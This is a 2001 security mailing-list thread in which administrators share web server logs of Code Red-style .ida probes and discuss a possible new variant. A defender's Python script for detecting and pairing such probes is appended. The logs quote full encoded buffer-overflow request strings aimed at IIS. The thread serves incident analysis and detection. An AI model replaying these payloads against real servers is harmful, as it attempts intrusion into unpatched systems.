RE: CRv3? Or some other ida type

From: Pat Moffitt (pmoffitt@wrv.com)
Date: 08/01/01


From: "Pat Moffitt" <pmoffitt@wrv.com>
To: <mike@msbnetworks.com>, <incidents@securityfocus.com>
Subject: RE: CRv3?  Or some other ida type
Date: Wed, 1 Aug 2001 09:35:07 -0700
Message-ID: <001501c11aa7$ec64e3a0$48bb42cf@mis1.wrv.com>

Here is what I have seen so far. Yes, it does look like pairs, but it looks like
the same old GET statement, doesn't it?

I have seen increased port scans for port 80 today.

64.23.82.33 - - [01/Aug/2001:07:44:29 -0700] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090
%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%
u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 252

64.23.82.33 - - [01/Aug/2001:07:44:29 -0700] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%
u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%
u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 252

193.89.247.134 - - [01/Aug/2001:07:58:05 -0700] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090
%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u81
90%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 252

193.89.247.134 - - [01/Aug/2001:07:58:05 -0700] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090
%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u81
90%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 252

Pat Moffitt
MIS Administrator
Western Recreational Vehicles, Inc.

> -----Original Message-----
> From: mike@msbnetworks.com [mailto:mike@msbnetworks.com]
> Sent: Tuesday, July 31, 2001 3:24 PM
> To: incidents@securityfocus.com
> Subject: CRv3? Or some other ida type
>
>
> So I've had my servers scanning for .ida probes
> (They're Apache - I'm just curious) Well, after
> 5PM EDT, I started to see a few probes that
> looked different than the Code Red probe
> (default.ida?NNN)
>
> Here's what I've seen so far:
>
> 136.176.193.XXX - - [31/Jul/2001:16:59:39 -
> 0400] "GET /x.ida?
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAA=X HTTP/1.1" 404 280 "-" "-"
>
> [somehost].bradley.edu - - [31/Jul/2001:17:11:24 -
> 0400] "GET /x.ida?
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAA=X HTTP/1.1" 404 211 "-" "-"
>
> The interesting thing is I'm getting probed twice
> by each host, about 2 minutes apart. Also, it
> must be doing random IP generation - I have
> servers on numerous sequential IPs, and I have
> not seen the probes move from one IP to the next.
>
> The traffic has been light (less than 10 probes so
> far) but given it's not even 8PM yet :) Just
> thought I'd post - this may be totally unrelated, but
> it might be CRv3 - so I figured I'd post.
>
> ------------------------------------------------------------------
> ----------
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management
> and tracking system please see: http://aris.securityfocus.com
>
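
A defender's way to pull the .ida probes out of an Apache access log and check the "probed twice by each host" pattern that both messages above describe, added here as an example that is not part of either post. The sample log lines are constructed stand-ins for the ones quoted (IPs are documentation-range placeholders), and the 5-minute pairing window is an assumption.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample Apache log lines modelled on the probes quoted in this thread, one request per line.
CR_TAIL = "%u9090%u6858%ucbd3%u7801%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a"
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Aug/2001:07:44:29 -0700] "GET /default.ida?' + "N" * 224 + CR_TAIL + ' HTTP/1.0" 400 252',
    '192.0.2.10 - - [01/Aug/2001:07:44:29 -0700] "GET /default.ida?' + "N" * 224 + CR_TAIL + ' HTTP/1.0" 400 252',
    '198.51.100.7 - - [31/Jul/2001:16:59:39 -0400] "GET /x.ida?' + "A" * 220 + '=X HTTP/1.1" 404 280 "-" "-"',
    '198.51.100.7 - - [31/Jul/2001:17:01:40 -0400] "GET /x.ida?' + "A" * 220 + '=X HTTP/1.1" 404 211 "-" "-"',
    '203.0.113.5 - - [01/Aug/2001:08:00:00 -0700] "GET /index.html HTTP/1.0" 200 1043',
]

# Common/combined log format: client ident user [timestamp] "method path[?query] proto" status ...
LOG_RE = re.compile(r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"[A-Z]+ (?P<path>[^ ?"]+)(?:\?(?P<query>[^ "]*))? [^"]*" (?P<status>\d{3})')

def parse_ida_probe(line):
    """Describe a request for an .ida resource; return None for any other line."""
    m = LOG_RE.match(line)
    if not m or not m.group("path").lower().endswith(".ida"):
        return None
    query = m.group("query") or ""
    filler = query[0] if query else ""
    # The original Code Red probe: /default.ida, a long run of 'N', then a %u-encoded tail.
    if m.group("path").lower() == "/default.ida" and filler == "N" and "%u" in query:
        kind = "code-red"
    else:
        kind = "other-ida"  # e.g. the x.ida?AAA...=X probes in the original post
    return {"host": m.group("host"), "path": m.group("path"), "filler": filler, "kind": kind,
            "status": int(m.group("status")),
            "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")}

def probes_by_source(lines, window=timedelta(minutes=5)):
    """Group .ida probes per client; 'paired' is True when one client probed again within `window`."""
    by_host = defaultdict(list)
    for line in lines:
        p = parse_ida_probe(line)
        if p:
            by_host[p["host"]].append(p)
    summary = {}
    for host, probes in by_host.items():
        probes.sort(key=lambda p: p["ts"])
        gaps = [b["ts"] - a["ts"] for a, b in zip(probes, probes[1:])]
        summary[host] = {"count": len(probes),
                         "kinds": sorted({p["kind"] for p in probes}),
                         "paired": any(g <= window for g in gaps)}
    return summary
```

Feed it real access log lines (unwrapped, one request per line) and any host with `paired` set and a `kinds` entry other than `code-red` is a candidate for the variant the original post asks about.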
